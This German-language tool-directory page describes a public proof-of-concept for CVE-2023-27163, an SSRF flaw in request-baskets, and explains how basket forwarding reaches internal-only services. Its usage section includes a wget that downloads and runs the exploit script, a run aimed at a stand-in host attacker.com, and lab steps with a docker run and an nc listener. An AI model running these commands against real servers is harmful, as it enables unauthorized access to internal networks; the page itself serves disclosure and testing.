Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-27163 — Proof-of-Concept für Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1) | Kitploit
Tools/GitHubGitHub/entr0pie/cve-2023-27163
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Proof-of-Concept für Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)

Repository anzeigen
315vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

PoC zu SSRF in Request-Baskets (CVE-2023-27163)

Dieses Repository enthält einen Proof-of-Concept (PoC) für CVE-2023-27163, eine Server-Side-Request-Forgery-Schwachstelle (SSRF), die in request-baskets bis Version 1.2.1 entdeckt wurde. Diese Schwachstelle ermöglicht es Angreifern, über eine manipulierte API-Anfrage auf Netzwerkressourcen und vertrauliche Informationen zuzugreifen, indem sie die Komponente /api/baskets/{name} ausnutzen.

Dank an @b33t1e, @chelinboo147 und @houqinsheng (siehe Artikel).

Verwendung

root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

Wie funktioniert es?

Request-baskets ist eine Webanwendung, die dazu dient, Anfragen auf einer bestimmten Route, dem sogenannten Basket, zu sammeln und zu registrieren. Beim Erstellen kann der Benutzer einen anderen Server angeben, an den die Anfrage weitergeleitet wird. Das Problem dabei ist, dass der Benutzer unbeabsichtigte Dienste angeben kann, beispielsweise Anwendungen, die vom Netzwerk abgeschottet sind.

Zum Beispiel: Angenommen, der Server hostet Request-baskets (Port 55555) und einen Flask-Webserver auf Port 8000. Der Flask ist außerdem so konfiguriert, dass er nur mit localhost kommuniziert. Indem der Angreifer einen Basket erstellt, der an http://localhost:8000 weiterleitet, kann er auf den zuvor eingeschränkten Flask-Webserver zugreifen.

Testen auf localhost

PoC-Bild

  1. Starte den Docker-Container von Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Lade den PoC herunter
root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. Warte auf eine Verbindung
root@kitploit:~
nc -lvp 8000
  1. Speichere die IP-Adresse des Docker-Hosts
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Führe den PoC aus
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

Lizenz

Dieses Projekt steht unter der Unlicense.

Tool herunterladen